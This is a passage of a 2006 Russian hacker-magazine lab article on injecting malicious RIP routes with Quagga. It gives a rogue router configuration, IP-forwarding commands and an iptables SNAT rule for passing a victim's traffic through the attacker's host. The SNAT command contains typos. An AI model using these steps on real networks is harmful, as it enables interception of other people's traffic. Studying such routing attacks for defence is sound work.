Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #66, МАЙ 2006 г.

лабораторная работа

КОНСТАНТИН ГАВРИЛЕНКО

Спецвыпуск: Хакер, номер #066, стр. 066-018-7


Листинг 11. Пример конфигурации демона RIP

hostname rogue.ripd

password 8 jhNan2ucC95.g

enable password 8 Ca/yaFGI.I2h

log file /var/log/quagga/ripd.log

service advanced-vty

service password-encryption

!

key chain dmz_auth

key 1

key-string 123456

!

interface eth0

description DMZ_network

ip rip authentication mode md5

ip rip authentication key-chain dmz_auth

!

router rip

version 2

redistribute connected

redistribute static

network 192.168.69.0/24

!

line vty

exec-timeout 30 0

!

Одна из команд, которая отсутствует в IOS, но будет очень полезна для ввода маршрутов через Quagga, — как ни странно, route xxx.xxx.xxx.xxx/yy, которая позволяет включать его в пакет обновления RIP не создавая маршрут в Kernel.

[введение зловредных маршрутов в RIP.] Основная цель злоумышленника — не просто перевести трафик в так называемую «черную дыру» и прервать сообщение между сетям, а в первую очередь перевести трафик через свою машину, чтобы извлечь «полезную» информацию. Соответственно, необходима подготовка для беспрепятственной маршрутизации через свой хост, для чего включается поддержка маршрутизации в Kernel (она выполняется через /proc-интерфейс).

Листинг 12. Включение поддержки маршрутизации

arhontus / # echo 1 > /proc/sys/net/ipv4/ip_forward

Листинг 13. Удостоверяемся, что маршрутизация также разрешена в iptables

arhontus / # iptables -L FORWARD

Chain FORWARD (policy ACCEPT)

target prot opt source destination

При необходимости можно разрешить маршрутизацию только с определенной сети и прописать политику по умолчанию на DROP, что позволит отбросить весь ненужный трафик и ограничить загруженность канала.

Могут сложиться такие ситуации, когда ты находишься в той же подсети, что и легитимный маршрутизатор, через который осуществляется передача трафика. Если перевести поток данных через пиратский маршрутизатор (вводишь зловредный маршрут, чтобы потом передать его легитимному маршрутизатору), обратный трафик будет отдаваться с легитимного маршрутизатора согласно его таблице маршрутизации, минуя тебя. Что делать? Один из спасительных вариантов — ввести два зловредных маршрута для каждого из легитимных маршрутизаторов, где твой хост выступает в качестве следующего узла для каждой из подсетей. Второй вариант спасения от проблемы — трансляция сетевых адресов и подмена адреса оригинатора на твой, опять же при помощи команды iptables.

Листинг 14. Подмена адреса оригинатора

arhontus / # iptables -t nat -A POSTROUITING-o eth0 -s $victim_IP-j SNAT –to-source $your_IP

[ЭКСПЕРИМЕНТ]

Практическая часть, самая интересная и долгожданная :). В следующих примерах аутентификация будет выключена, так как основная задача этого примера — показать принципы введения зловредных маршрутов и изменения таблицы маршрутизации.

Листинг 15. Таблица маршрутизации хоста M1

C 192.168.0.1/32 is directly connected, Serial0

C 192.168.1.0/24 is directly connected, Serial0

C 192.168.10.0/24 is directly connected, Serial0

Назад на стр. 066-018-6  Содержание  Вперед на стр. 066-018-8